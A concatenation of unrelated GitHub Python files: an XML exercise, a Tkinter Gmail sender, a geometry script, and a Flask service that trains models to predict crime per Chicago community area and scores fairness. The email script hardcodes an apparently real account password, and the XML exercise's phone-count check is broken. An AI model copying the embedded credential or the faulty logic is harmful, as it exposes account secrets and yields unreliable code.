0b9845a1dd7ff42f02f9dcf5f9f84eff059cf5b3 | 11dacddbfd4335419280b0ca63aaaa4dd49e2c42 | /Ejercicio 3.py | 51a3026505388eeed9d7785feeb57918e782597f | [] | no_license | Adrian-SB/XML | bf2ca0c9f429348d2b13cdf04b13ca140cc45c27 | 4d279ac63b32cd8d4849b1a5db21ef7ae471e8ea | refs/heads/master | 2020-05-27T14:50:27.501614 | 2017-03-09T17:29:53 | 2017-03-09T17:29:53 | 82,561,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 329 | py | # -*- coding: utf-8 -*-
from lxml import etree
doc = etree.parse("Empresas.xml")
raiz=doc.getroot()
#3-Lista las empresas con más de un teléfono.
nombres=raiz.findall("empresa/titulo")
telefonos=("empresa/telefono")
sep="/"
for n in nombres:
if sep in telefonos:
print "La empresa",n.text, "tiene 2 telefonos"
| [
"noreply@github.com"
] | noreply@github.com |
afc12a16980d6f8d26efb9e5861fdbff5be747a0 | 8650145ce5bf5f415f56d979b1a43cd3204628b8 | /Week 6 - Python APIs/Activities/3/Activities/09-Stu_Census/Unsolved/config.py | d0690c8370feeafe7512d99d32a61de35007117a | [] | no_license | Axioma42/Data_Analytics_Boot_Camp | d26f9035475cc1272ecbeff4054bc30f098933bb | 2c4be5eee7d016ba0f6505df2cb6e0a8ade0554c | refs/heads/master | 2022-12-11T15:27:10.495147 | 2019-11-10T01:12:23 | 2019-11-10T01:12:23 | 219,831,300 | 2 | 0 | null | 2022-12-08T02:35:58 | 2019-11-05T19:14:18 | Jupyter Notebook | UTF-8 | Python | false | false | 75 | py | # Enter your API keys
# Census API key -- replace the placeholder before running the notebook.
api_key = "YOUR KEY HERE!"
# Second API key (presumably Google Maps, given the `gkey` name -- confirm
# against the notebook that imports this config).
gkey = "YOUR KEY HERE!"
| [
"julio.padillaaviles@gmail.com"
] | julio.padillaaviles@gmail.com |
b49846e8bb66b1799b99451978e59a5d83fc92e9 | 13d13f28031e6b89b4a49918792349f4eaaa9e4f | /Project 5 - Email Sender.py | bfd3b4d058a74256a4193cc0dc760fb1b628ecbf | [] | no_license | TheFREAK69/Udemy-Master_Tkinter_By_Building_5_Fully_Functioning_Apps | 8d128614b6bfe7961f3a3837d3e437ddacc6ac08 | 170246976011eb6d813f1fbd29ab946158b53913 | refs/heads/master | 2020-03-15T07:04:24.768782 | 2018-05-03T16:30:54 | 2018-05-03T16:30:54 | 132,021,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,033 | py | ########################################################################################################################
#
# DATE: 2018-05-01
#
# RELEASE Notes:
# - Email function not working.
# - Everything else is ok.
#
########################################################################################################################
#============================================= Tkinter Settings =======================================================#
from tkinter import * # Not ready because cannot send mail.
from smtplib import SMTP_SSL as SMTP
from email.mime.text import MIMEText
#============================================= Main Window Settings ===================================================#
# Fixed-size 800x500 root window for the email form.
main_window = Tk()
main_window.title('Email Sender app')
main_window.geometry('800x500')
main_window.resizable(width=FALSE, height=FALSE)
main_window_bg_colour = 'gray30' # Set this as a variable that can be used across the code
main_window.configure(bg=main_window_bg_colour)
#============================================= Variables ==============================================================#
# Tk variables backing the From/To entry widgets.
send_from_variable = StringVar()
send_to_variable = StringVar()
# NOTE(review): email_message_variable is never referenced below (the message
# body uses a Text widget directly) -- candidate for removal.
email_message_variable = StringVar()
#============================================= Functions ==============================================================#
def clear_from_function():
    """Empty the "From" address entry."""
    send_from_entry.delete(0, END)
def clear_to_function():
    """Empty the "To" address entry."""
    send_to_entry.delete(0, END)
def clear_all_function():
    """Blank out the whole form: From entry, To entry, and the message body."""
    for entry in (send_from_entry, send_to_entry):
        entry.delete(0, END)
    email_message.delete('1.0', END)
def send_email_function():
    """Send the form contents as a plain-text email via Gmail's SSL SMTP endpoint.

    Reads sender/recipient from the entry widgets and the body from the Text
    widget, then logs in and sends. Errors are printed to stdout.
    """
    HOST = 'smtp.gmail.com'
    PORT = 465
    USERNAME = send_from_entry.get()
    # SECURITY: password is hardcoded in source -- move it to a config file,
    # environment variable, or an input prompt before distributing this code.
    PASSWORD = 'Appolo!7'
    SENDER = send_from_entry.get()
    RECIPIENT = send_to_entry.get()

    text_subtype = 'plain'
    # Bug fix: the original sent the literal string 'text' as the body,
    # ignoring what the user typed (see "Email function not working" in the
    # release notes). Use the Text widget's content instead.
    msg = MIMEText(email_message.get('1.0', END), text_subtype)
    msg['Subject'] = 'Python Script'
    msg['From'] = SENDER
    msg['To'] = RECIPIENT

    try:
        connection = SMTP(HOST, PORT)
        try:
            connection.login(USERNAME, PASSWORD)
            connection.sendmail(SENDER, RECIPIENT, msg.as_string())
        finally:
            # Always close the SMTP session (the original leaked it).
            connection.quit()
    except Exception as e:
        print(e)
#=============================================== Frames ===============================================================#
# Layout: address bar on top, status strip on bottom, message area on the
# left, action buttons on the right.
top_frame = Frame(main_window, width=900, height=50, bg=main_window_bg_colour)
top_frame.pack(side=TOP)
bottom_frame = Frame(main_window, width=800, height=50, bg='black')
bottom_frame.pack(side=BOTTOM)
left_frame = Frame(main_window, width=600, height=400, bg=main_window_bg_colour)
left_frame.pack(side=LEFT)
right_frame = Frame(main_window, width=200, height=400, bg=main_window_bg_colour)
right_frame.pack(side=RIGHT)
#=============================================== Buttons ==============================================================#
# `command=` takes the callable itself; the original wrapped each handler in a
# needless zero-argument lambda.
clear_from_button = Button(right_frame, text="Clear From", width=10, highlightbackground=main_window_bg_colour,
                           command=clear_from_function)
clear_from_button.pack(side=TOP, padx=(0,8), pady=(0,5))
clear_to_button = Button(right_frame, text="Clear To", width=10, highlightbackground=main_window_bg_colour,
                         command=clear_to_function)
clear_to_button.pack(side=TOP, padx=(0,8), pady=(0,5))
clear_all_button = Button(right_frame, text="Clear All", width=15, highlightbackground=main_window_bg_colour,
                          command=clear_all_function)
clear_all_button.pack(side=TOP, padx=(0,8), pady=(0,5))
send_button = Button(right_frame, text="Send Email", width=20, highlightbackground=main_window_bg_colour,
                     command=send_email_function)
send_button.pack(side=TOP, padx=(0,8), pady=(20,0))
#=========================================== Labels + Entries =========================================================#
# From/To address row along the top frame; entries are backed by the
# StringVars declared above.
send_from_label = Label(top_frame, text="From:", font=('', 25, 'bold'), fg='white', bg=main_window_bg_colour)
send_from_label.pack(side=LEFT, padx=(0,0), pady=(5,5))
send_from_entry = Entry(top_frame, width=30, textvariable=send_from_variable, fg='white', font=('', 15),
                        bg=main_window_bg_colour, bd=4)
send_from_entry.pack(side=LEFT, padx=(0,10), pady=(5,5))
send_to_label = Label(top_frame, text="To:", font=('', 25, 'bold'), fg='white', bg=main_window_bg_colour)
send_to_label.pack(side=LEFT, padx=(0,0), pady=(5,5))
send_to_entry = Entry(top_frame, width=30, textvariable=send_to_variable, fg='white', font=('', 15),
                      bg=main_window_bg_colour, bd=4)
send_to_entry.pack(side=LEFT, padx=(0,10), pady=(5,5))
#==================================================== Text ============================================================#
# Message body widget (cleared by clear_all_function).
email_message = Text(left_frame, font=('', 15), width=59, bg='white')
email_message.pack(side=LEFT, padx=(1,1), pady=(1,1))
#================================================== Main Loop =========================================================#
main_window.mainloop() | [
"noreply@github.com"
] | noreply@github.com |
0d15a97572af7fdb6b7ca4d3361515e161ea6c19 | 7216bcfa10aa4d0c891d11845beda6139f608264 | /Oeving1/tetraeder.py | 9665b70963e8504c1fc3c9f744f16b75c2d55969 | [] | no_license | kaffikaffi/ITGK | 4fc6f2c0383b75e1439f3f87b9fe2498f019a6ee | c87cb9da129584e9269dd4ce1d6b8451f08b2c35 | refs/heads/master | 2020-07-13T18:07:17.635353 | 2019-10-06T19:16:11 | 2019-10-06T19:16:11 | 205,128,540 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | height = input("hva er høyden til tetraederet?: ")
import math

# Edge length of a regular tetrahedron from its height h: h = a*sqrt(6)/3,
# hence a = 3*h/sqrt(6).
edge = 3 / math.sqrt(6) * int(height)
surface_area = math.sqrt(3) * math.pow(edge, 2)
volume = math.sqrt(2) * math.pow(edge, 3) / 12
# Report (in Norwegian): for a tetrahedron of the given height, its surface
# area and volume.
print("I et tetraeder der høyden er " + height + " blir overflatearealet " + str(surface_area) + " og volumet blir " + str(volume))
"35420892+kaffikaffi@users.noreply.github.com"
] | 35420892+kaffikaffi@users.noreply.github.com |
3ee9bb126a75e9e5ea4cf37cbc3ae41b39e9747b | c975fd016cdb72b5e4bbded9706f224bb993084c | /application.py | 3a5e080e3f0b2f5d253a88bb9762641f156e5061 | [
"MIT"
] | permissive | UCB-MIDS/w210_crime_machine_learning | 5c5350fa628c90c8d8c7d3a1ee79ea516219979d | 4105b3afd4d3457904d94d06abf2205fbda68e94 | refs/heads/master | 2020-04-20T20:15:50.890268 | 2019-04-14T23:34:28 | 2019-04-14T23:34:28 | 169,071,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,420 | py | # W210 Police Deployment
# MACHINE LEARNING Microservices
import numpy as np
import pandas as pd
import subprocess
import shlex
import threading
import s3fs
import tempfile
import pickle
import joblib
import json
import itertools
import configparser
from datetime import datetime
from scipy.stats import t
from collections import defaultdict
from flask import Flask
from flask_restful import Resource, Api, reqparse
from flask_cors import CORS, cross_origin
from flask_sqlalchemy import SQLAlchemy
# Calculation of prediction Fairness
# Uses a difference of means test as described in https://link.springer.com/article/10.1007%2Fs10618-017-0506-1
def calculateFairness(communities, predictions):
comm_count = {0: 0, 1: 0}
predicted_count = {0: 0, 1: 0}
for comm in predictions:
comm_code = int(comm)
if (communities[comm_code]['ethnicity'] == 0) or (communities[comm_code]['ethnicity'] == 1):
comm_count[1] += 1
predicted_count[1] += predictions[comm]
else:
comm_count[0] += 1
predicted_count[0] += predictions[comm]
df = comm_count[0]+comm_count[1]-2
if (predicted_count[0] == 0) and (predicted_count[1] == 0):
return 1
means = {0: predicted_count[0]/comm_count[0], 1: predicted_count[1]/comm_count[1]}
variances = {0: 0, 1: 0}
for comm in predictions:
comm_code = int(comm)
if (communities[comm_code]['ethnicity'] == 0) or (communities[comm_code]['ethnicity'] == 1):
variances[1] += (predictions[comm]-means[1])**2
else:
variances[0] += (predictions[comm]-means[0])**2
variances = {0: variances[0]/(comm_count[0]-1), 1: variances[1]/(comm_count[1]-1)}
sigma = ((((comm_count[0]-1)*(variances[0]**2))+((comm_count[1]-1)*(variances[1]**2)))/(comm_count[0]+comm_count[1]-2))**0.5
t_stat = (means[0]-means[1])/(sigma*(((1/comm_count[0])+(1/comm_count[1]))**0.5))
fairness = (1 - t.cdf(abs(t_stat), df)) * 2
fairness = fairness*100
return fairness
def load_keras_model(modelname):
from keras.models import model_from_json
from keras.models import Sequential
from keras.layers import Dense
from keras import backend as K
from keras.wrappers.scikit_learn import KerasRegressor
import tensorflow as tf
s3fs.S3FileSystem.read_timeout = 5184000 # one day
s3fs.S3FileSystem.connect_timeout = 5184000 # one day
s3 = s3fs.S3FileSystem(anon=False)
K.clear_session()
struct_file = 'w210policedata/models/'+modelname+'/keras_struct.json'
weights_file = 'w210policedata/models/'+modelname+'/keras_weights.h5'
features_file = 'w210policedata/models/'+modelname+'/keras_features.pickle'
scaler_file = 'w210policedata/models/'+modelname+'/keras_scaler.pickle'
modelinfo_file = 'w210policedata/models/'+modelname+'/modelinfo.pickle'
with s3.open(struct_file, "r") as json_file:
model = model_from_json(json_file.read())
json_file.close()
temp_file = tempfile.NamedTemporaryFile(delete=True)
s3.get(weights_file,temp_file.name)
model.load_weights(temp_file.name)
graph = tf.get_default_graph()
temp_file.close()
model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mean_absolute_error'])
with s3.open(features_file, "rb") as pickle_file:
model_features = pickle.load(pickle_file)
pickle_file.close()
model_type = 'keras'
with s3.open(scaler_file, "rb") as pickle_file:
model_scalers = pickle.load(pickle_file)
pickle_file.close()
with s3.open(modelinfo_file, "rb") as pickle_file:
model_info = pickle.load(pickle_file)
pickle_file.close()
model_name = model_info['modelname']
return model,model_name,model_features,graph,model_type,model_scalers,model_info
def load_xgb_model(modelname):
    """Load an XGBoost regressor and its metadata from S3.

    Counterpart of load_keras_model for 'xgboost'-type models; returns the
    same 7-tuple, with `graph` always None (no TensorFlow graph involved).
    """
    from xgboost import XGBRegressor
    s3fs.S3FileSystem.read_timeout = 5184000  # 5184000 s = 60 days (previous comment said "one day")
    s3fs.S3FileSystem.connect_timeout = 5184000  # 60 days
    s3 = s3fs.S3FileSystem(anon=False)
    model_file = 'w210policedata/models/'+modelname+'/xgbregressor_model.joblib'
    features_file = 'w210policedata/models/'+modelname+'/xgbregressor_features.pickle'
    scaler_file = 'w210policedata/models/'+modelname+'/xgbregressor_scaler.pickle'
    modelinfo_file = 'w210policedata/models/'+modelname+'/modelinfo.pickle'
    # joblib needs a local path, so stage the model file in a temp file.
    temp_file = tempfile.NamedTemporaryFile(delete=True)
    s3.get(model_file,temp_file.name)
    model = joblib.load(temp_file.name)
    graph = None
    temp_file.close()
    with s3.open(features_file, "rb") as pickle_file:
        model_features = pickle.load(pickle_file)
        pickle_file.close()
    #model.get_booster().feature_names = model_features
    model_type = 'xgboost'
    with s3.open(scaler_file, "rb") as pickle_file:
        model_scalers = pickle.load(pickle_file)
        pickle_file.close()
    with s3.open(modelinfo_file, "rb") as pickle_file:
        model_info = pickle.load(pickle_file)
        pickle_file.close()
    model_name = model_info['modelname']
    return model,model_name,model_features,graph,model_type,model_scalers,model_info
def load_model(modelname):
    """Load *modelname* from S3, dispatching on the type recorded in its
    modelinfo.pickle ('keras' vs anything else -> xgboost loader)."""
    info_path = 'w210policedata/models/' + modelname + '/modelinfo.pickle'
    with s3.open(info_path, "rb") as info_file:
        info = pickle.load(info_file)
    loader = load_keras_model if info['type'] == 'keras' else load_xgb_model
    return loader(modelname)
### Load Flask configuration file (pulled from S3 into the working directory)
s3fs.S3FileSystem.read_timeout = 5184000  # 5184000 s = 60 days (previous comment said "one day")
s3fs.S3FileSystem.connect_timeout = 5184000  # 60 days
s3 = s3fs.S3FileSystem(anon=False)
config_file = 'w210policedata/config/config.py'
try:
    s3.get(config_file,'config.py')
except:
    # NOTE(review): bare except + print only -- from_pyfile below will still
    # fail if config.py is missing; consider failing fast here.
    print('Failed to load application configuration file!')
# Flask app, REST API wrapper, DB connection and CORS setup.
application = Flask(__name__)
api = Api(application)
application.config.from_pyfile('config.py')
db = SQLAlchemy(application)
application.config['CORS_ENABLED'] = True
CORS(application)
## Define the DB model
## Define the DB model
class Community(db.Model):
    """Chicago community area row: numeric code, display name and an integer
    ethnicity code. Codes 0 and 1 form the protected group used by
    calculateFairness."""
    __tablename__ = 'community'
    id = db.Column(db.Integer, primary_key=True)
    # Community-area number as used in the crime dataset / prediction keys.
    code = db.Column(db.Integer)
    name = db.Column(db.String(255))
    # Dominant-ethnicity code (semantics defined by the data load -- 0/1 are
    # treated as the protected group in calculateFairness).
    ethnicity = db.Column(db.Integer)
    def __str__(self):
        return self.name
# Handle to the currently running training subprocess (None when idle) and a
# rolling capture of its stdout lines, filled by processTracker.
runningProcess = None
processStdout = []
# Currently loaded prediction model and its metadata; populated at startup
# below and replaced by the reloadModel endpoint.
model = None
model_name = None
model_features = None
model_type = None
graph = None
model_scalers = None
model_info = None
# Feature descriptors and per-community feature values used when building
# prediction input frames.
available_features = None
features_data = None
### Load default model configuration from ml.ini on S3; create the file with
### defaults on first run, then load the default model and feature data.
s3fs.S3FileSystem.read_timeout = 5184000  # 5184000 s = 60 days (previous comment said "one day")
s3fs.S3FileSystem.connect_timeout = 5184000  # 60 days
s3 = s3fs.S3FileSystem(anon=False)
config_file = 'w210policedata/config/ml.ini'
try:
    temp_file = tempfile.NamedTemporaryFile(delete=True)
    s3.get(config_file,temp_file.name)
    config = configparser.ConfigParser()
    config.read(temp_file.name)
except:
    # First run (or S3 failure): write a default config back to S3.
    print('Failed to load configuration file.')
    print('Creating new file with default values.')
    config = configparser.ConfigParser()
    config['GENERAL'] = {'DefaultModel': 'keras'}
    temp_file = tempfile.NamedTemporaryFile(delete=True)
    with open(temp_file.name, 'w') as confs:
        config.write(confs)
    s3.put(temp_file.name,config_file)
temp_file.close()
default_model = config['GENERAL']['DefaultModel']
model,model_name,model_features,graph,model_type,model_scalers,model_info = load_model(default_model)
try:
    # Feature descriptors (which columns exist and which are one-hot encoded)
    # plus per-community feature values, merged into every prediction input.
    features_file = 's3://w210policedata/datasets/AvailableFeatures.pickle'
    s3 = s3fs.S3FileSystem(anon=False)
    with s3.open(features_file, "rb") as json_file:
        available_features = pickle.load(json_file)
        json_file.close()
    # features_file = 's3://w210policedata/datasets/AdditionalFeatures.parquet'
    # features_data = pd.read_parquet(features_file)
    features_file = 's3://w210policedata/datasets/AdditionalFeatures.csv'
    features_data = pd.read_csv(features_file)
    features_data['Community Area'] = features_data['Community Area'].map(str)
except Exception as e:
    print('Failure reading additional feature data from S3.')
# Services to implement:
# * Train
# * Predict
# * Evaluate model
def processTracker(process):
    """Drain *process* stdout into the global processStdout buffer.

    Runs on a background thread until the process closes its stdout, then
    polls once so the return code is populated for the status endpoint.
    """
    for line in iter(process.stdout.readline, b''):
        # Fix: the original wrapped the decoded line in a redundant
        # '{0}'.format(...) call; appending the decoded string is equivalent.
        processStdout.append(line.decode('utf-8'))
    process.poll()
class checkService(Resource):
    """Liveness probe for the ML microservice."""
    def get(self):
        """Confirm the service is up and responding."""
        return {
            'message': 'Machine learning service is running.',
            'result': 'success',
        }
class trainModel(Resource):
    """Endpoint that launches a background model-training subprocess."""
    def get(self):
        """Start training. Query args (all JSON-encoded): modelname,
        modeltype ('keras' or 'xgboost'), features (list of feature names).
        Refuses to start while a previous training job is still running."""
        global runningProcess
        global processStdout
        trainParser = reqparse.RequestParser()
        trainParser.add_argument('modelname')
        trainParser.add_argument('modeltype')
        trainParser.add_argument('features')
        args = trainParser.parse_args()
        if args['modelname'] is None:
            return {'message':'Missing modelname argument.','result':'failed'}
        if args['modeltype'] is None:
            return {'message':'Missing modeltype argument. Supported types: keras, xgboost.','result':'failed'}
        if args['features'] is None:
            return {'message':'Missing features argument.','result':'failed'}
        # Only one training job at a time: poll() is None while still running.
        if (runningProcess is not None):
            if (runningProcess.poll() is None):
                return {'message':'There is a model training job currently running.','pid':runningProcess.pid,'result': 'failed'}
        try:
            # Build the trainer command line; features are quoted because they
            # may contain spaces, then shlex.split tokenizes for Popen
            # (shell=False, so no shell injection).
            if json.loads(args['modeltype']) == 'keras':
                command = 'python trainer_keras.py'
            else:
                command = 'python trainer_xgbregressor.py'
            command += ' '+json.loads(args['modelname'])
            for feature in json.loads(args['features']):
                command += ' "'+feature+'"'
            print(shlex.split(command))
            runningProcess = subprocess.Popen(shlex.split(command),stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
            processStdout = []
            # Capture trainer output on a daemon-less background thread.
            t = threading.Thread(target=processTracker, args=(runningProcess,))
            t.start()
        # NOTE(review): bare except hides the failure cause; consider
        # `except Exception as e` and returning str(e).
        except:
            return{'message':'Model training failed.','pid':None,'result': 'failed'}
        return {'message':'Model training started.','pid':runningProcess.pid,'result': 'success'}
class getTrainingStatus(Resource):
    """Endpoint reporting the state of the background training job."""
    def get(self):
        """Return the trainer's return code, a status string, and its
        captured stdout; all-None fields when no trainer was ever started."""
        global runningProcess
        global processStdout
        if runningProcess is None:
            return {'returncode': None, 'status': 'No model training running', 'stdout': None}
        rc = runningProcess.poll()
        if rc is None:
            return {'returncode': None, 'status': 'Model is still training', 'stdout': processStdout}
        finished = 'Model training finished succesfully'
        failed = 'Model training failed'
        return {'returncode': rc, 'status': failed if rc != 0 else finished, 'stdout': processStdout}
class killTrainer(Resource):
    """Endpoint that aborts a running training job."""
    def get(self):
        """Kill the trainer subprocess if one is still alive; record the
        abort in the captured stdout log."""
        global runningProcess
        global processStdout
        # Guard clause: nothing started, or the process already exited.
        if runningProcess is None or runningProcess.poll() is not None:
            return {'message': 'No model training running', 'result': 'failed'}
        runningProcess.kill()
        processStdout.append('[' + str(datetime.now()) + '] Model training killed.')
        return {'message': 'Kill signal sent to model trainer.', 'result': 'success'}
class predict(Resource):
    """Prediction endpoint: describe the loaded model (GET) or run it (POST)."""
    def get(self):
        """Return the loaded model's name, type and input feature list."""
        global model
        global model_name
        global model_features
        global model_type
        if (model is None):
            return {'message':'Model is not loaded','result':'failed'}
        return {'model_name':model_name,'model_type':model_type,'input_features':model_features,'result':'success'}
    def post(self):
        """Predict crime counts for every combination of the JSON-encoded
        list args communityarea (defaults to all 77 areas), weekyear,
        weekday, hourday, crossed with every crime type the model knows."""
        global model
        global model_features
        global graph
        global model_type
        global model_scalers
        global model_info
        global available_features
        global features_data
        predictParser = reqparse.RequestParser()
        predictParser.add_argument('communityarea')
        predictParser.add_argument('weekday')
        predictParser.add_argument('weekyear')
        predictParser.add_argument('hourday')
        if (model is None):
            return {'message':'Model is not loaded','result':'failed'}
        args = predictParser.parse_args()
        # Decode each JSON list arg; only communityarea may be omitted
        # (Chicago community areas are numbered 1..77).
        for arg in args:
            if args[arg] is None:
                if (arg == 'communityarea'):
                    args[arg] = [i for i in range(1,78)]
                else:
                    return {'message':'Missing input '+arg,'result':'failed'}
            else:
                args[arg] = json.loads(args[arg])
        df = pd.DataFrame()
        # Crime types are recovered from the model's one-hot feature names.
        crime_types = [x for x in model_features if x.startswith('primaryType_')]
        results = []
        # One input row (and one result slot, same order) per combination.
        for ca,wy,wd,hd,ct in itertools.product(args['communityarea'],args['weekyear'],args['weekday'],args['hourday'],crime_types):
            line = {'Community Area':str(ca),'Week of the Year':str(wy),'Day of the Week':str(wd),
                    'Period of the Day':str(hd),'Crime Type':ct.replace('primaryType_','')}
            df = df.append(line, ignore_index=True)
            results.append({'communityArea':str(ca),'weekYear':wy,'weekDay':wd,'hourDay':hd,'primaryType':ct.replace('primaryType_',''),'pred':None})
        # Join per-community features, expand one-hot columns, add any model
        # feature absent from the frame, and order columns as the model expects.
        df = pd.merge(df, features_data, on='Community Area')
        for feat in available_features:
            if feat['onehot-encoded']:
                df = pd.concat([df,pd.get_dummies(df[feat['feature']], prefix=feat['column'])],axis=1)
                df.drop(columns=[feat['feature']], inplace=True)
        for feat in model_features:
            if feat not in df:
                df[feat] = 0
        df.fillna(0,inplace=True)
        df = df.filter(items=model_features,axis=1)
        if (model_type == 'keras'):
            df = model_scalers['x'].transform(df)
            # Keras predictions must run inside the graph captured at load time.
            with graph.as_default():
                prediction = model.predict(df)
            prediction = model_scalers['y'].inverse_transform(prediction)
        else:
            df = model_scalers['x'].transform(df)
            prediction = model.predict(df)
            prediction = model_scalers['y'].inverse_transform(prediction.reshape(-1,1))
        print(len(prediction))
        # Round to a count with a -0.39 offset -- presumably a calibration
        # threshold chosen during evaluation (confirm with training notebooks);
        # clamp at zero.
        for i in range(len(prediction)):
            if model_type == 'keras':
                results[i]['pred'] = int(max(np.round(float(prediction[i][0])-0.39+0.5),0))
            else:
                results[i]['pred'] = int(max(np.round(float(prediction[i])-0.39+0.5),0))
        return {'result':results}
class predictionAndKPIs(Resource):
    """Like `predict`, but also aggregates map-ready totals and the fairness KPI."""
    def get(self):
        """Return the loaded model's name, type and input feature list."""
        global model
        global model_features
        global model_type
        global model_name
        if (model is None):
            return {'message':'Model is not loaded','result':'failed'}
        return {'model_name':model_name,'model_type':model_type,'input_features':model_features,'result':'success'}
    def post(self):
        """Run predictions (same pipeline as predict.post) and additionally
        return totals by community and by crime type plus the fairness score."""
        global model
        global model_features
        global graph
        global model_type
        global model_scalers
        global model_info
        # NOTE(review): unlike predict.post, available_features/features_data
        # are not declared global here; harmless since they are only read.
        predictParser = reqparse.RequestParser()
        predictParser.add_argument('communityarea')
        predictParser.add_argument('weekday')
        predictParser.add_argument('weekyear')
        predictParser.add_argument('hourday')
        if (model is None):
            return {'message':'Model is not loaded','result':'failed'}
        args = predictParser.parse_args()
        # Decode JSON list args; communityarea defaults to all 77 areas.
        for arg in args:
            if args[arg] is None:
                if (arg == 'communityarea'):
                    args[arg] = [i for i in range(1,78)]
                else:
                    return {'message':'Missing input '+arg,'result':'failed'}
            else:
                args[arg] = json.loads(args[arg])
        df = pd.DataFrame()
        crime_types = [x for x in model_features if x.startswith('primaryType_')]
        results = []
        # One input row (and one result slot, same order) per combination.
        for ca,wy,wd,hd,ct in itertools.product(args['communityarea'],args['weekyear'],args['weekday'],args['hourday'],crime_types):
            line = {'Community Area':str(ca),'Week of the Year':str(wy),'Day of the Week':str(wd),
                    'Period of the Day':str(hd),'Crime Type':ct.replace('primaryType_','')}
            df = df.append(line, ignore_index=True)
            results.append({'communityArea':str(ca),'weekYear':wy,'weekDay':wd,'hourDay':hd,'primaryType':ct.replace('primaryType_',''),'pred':None})
        # Join per-community features, expand one-hot columns, and align the
        # frame with the model's expected feature columns.
        df = pd.merge(df, features_data, on='Community Area')
        for feat in available_features:
            if feat['onehot-encoded']:
                df = pd.concat([df,pd.get_dummies(df[feat['feature']], prefix=feat['column'])],axis=1)
                df.drop(columns=[feat['feature']], inplace=True)
        for feat in model_features:
            if feat not in df:
                df[feat] = 0
        df.fillna(0,inplace=True)
        df = df.filter(items=model_features,axis=1)
        if (model_type == 'keras'):
            df = model_scalers['x'].transform(df)
            # Keras predictions must run inside the graph captured at load time.
            with graph.as_default():
                prediction = model.predict(df)
            prediction = model_scalers['y'].inverse_transform(prediction)
        else:
            df = model_scalers['x'].transform(df)
            prediction = model.predict(df)
            prediction = model_scalers['y'].inverse_transform(prediction.reshape(-1,1))
        # Round to a count with a -0.39 offset -- presumably a calibration
        # threshold chosen during evaluation; clamp at zero.
        for i in range(len(prediction)):
            if model_type == 'keras':
                results[i]['pred'] = int(max(np.round(float(prediction[i][0])-0.39+0.5),0))
            else:
                results[i]['pred'] = int(max(np.round(float(prediction[i][0])-0.39+0.5),0))
        # Consolidate into map format and calculate KPIs
        crimeByCommunity = defaultdict(int)
        crimeByType = defaultdict(int)
        communities = {}
        predictionFairness = 0
        # Community metadata (ethnicity codes) comes from the DB.
        for comm in db.session.query(Community):
            communities[comm.code] = {'id':comm.id,'code':comm.code,'name':comm.name,'ethnicity':comm.ethnicity}
        for result in results:
            if (result['communityArea'] is not None) and (result['primaryType'] is not None) and (result['communityArea'] != '0') and (result['primaryType'] != ''):
                crimeByCommunity[result['communityArea']] += result['pred']
                crimeByType[result['primaryType']] += result['pred']
        predictionFairness = calculateFairness(communities,crimeByCommunity)
        return {'crimeByCommunity':crimeByCommunity, 'crimeByType':crimeByType, 'fairness': predictionFairness, 'predictions':results, 'result':'success'}
class reloadModel(Resource):
    """Endpoint that swaps the in-memory model for another one stored on S3."""
    def get(self):
        """Load the model named by the JSON-encoded `modelname` arg and
        refresh the feature descriptors/data used to build inputs."""
        global model
        global model_name
        global model_features
        global graph
        global model_type
        global model_scalers
        global model_info
        global features_data
        global available_features
        loadParser = reqparse.RequestParser()
        loadParser.add_argument('modelname')
        args = loadParser.parse_args()
        if args['modelname'] is None:
            return {'message':'Missing modelname argument.','result':'failed'}
        try:
            model,model_name,model_features,graph,model_type,model_scalers,model_info = load_model(json.loads(args['modelname']))
            # Reload feature metadata alongside the model so both stay in sync.
            features_file = 's3://w210policedata/datasets/AvailableFeatures.pickle'
            s3 = s3fs.S3FileSystem(anon=False)
            with s3.open(features_file, "rb") as json_file:
                available_features = pickle.load(json_file)
                json_file.close()
            #features_file = 's3://w210policedata/datasets/AdditionalFeatures.parquet'
            #features_data = pd.read_parquet(features_file)
            features_file = 's3://w210policedata/datasets/AdditionalFeatures.csv'
            features_data = pd.read_csv(features_file)
            features_data['Community Area'] = features_data['Community Area'].map(str)
            return{'message':'Model loaded succesfully.','error':None,'result': 'success'}
        except Exception as e:
            return{'message':'Model load failed.','error':str(e),'result': 'failed'}
class getAvailableModels(Resource):
    """REST endpoint listing every trained model stored under s3://w210policedata/models."""
    def get(self):
        """Return {'models': [...model_info dicts...], 'result': 'success'} or a failure dict."""
        # Look into S3 Models folder for trained models
        models = []
        try:
            s3 = s3fs.S3FileSystem(anon=False)
            items = s3.ls('w210policedata/models',detail=True)
            for item in items:
                # Each model is a directory containing a pickled modelinfo record.
                if item['StorageClass'] == 'DIRECTORY':
                    modelinfo_file = item['Key']+'/modelinfo.pickle'
                    with s3.open(modelinfo_file, "rb") as pickle_file:
                        model_info = pickle.load(pickle_file)
                        pickle_file.close()
                    models.append(model_info)
        except Exception as e:
            return{'message':'Failure reading model data from S3.','error':str(e),'result':'failed'}
        return {'models':models,'result':'success'}
class getAvailableFeatures(Resource):
    """REST endpoint that refreshes and returns the available-features list from S3."""
    def get(self):
        """Reload `available_features` and `features_data` globals, then return the features."""
        global available_features
        global features_data
        try:
            #file = './data/OneHotEncodedDataset.parquet' # This line to read from local disk
            features_file = 's3://w210policedata/datasets/AvailableFeatures.pickle' # This line to read from S3
            #training_data = pd.read_csv(file,sep=',', error_bad_lines=False, dtype='unicode')
            s3 = s3fs.S3FileSystem(anon=False)
            with s3.open(features_file, "rb") as json_file:
                available_features = pickle.load(json_file)
                json_file.close()
            #features_file = 's3://w210policedata/datasets/AdditionalFeatures.parquet'
            #features_data = pd.read_parquet(features_file)
            features_file = 's3://w210policedata/datasets/AdditionalFeatures.csv'
            features_data = pd.read_csv(features_file)
            # Community Area is used as a string join key elsewhere.
            features_data['Community Area'] = features_data['Community Area'].map(str)
        except Exception as e:
            return{'message':'Failure reading available features data from S3.','error':str(e),'result':'failed'}
        return {'features':available_features,'result':'success'}
# Route table: bind each flask-restful Resource class to its URL endpoint.
api.add_resource(checkService, '/')
api.add_resource(trainModel, '/trainModel')
api.add_resource(getTrainingStatus, '/getTrainingStatus')
api.add_resource(killTrainer, '/killTrainer')
api.add_resource(predict, '/predict')
api.add_resource(predictionAndKPIs, '/predictionAndKPIs')
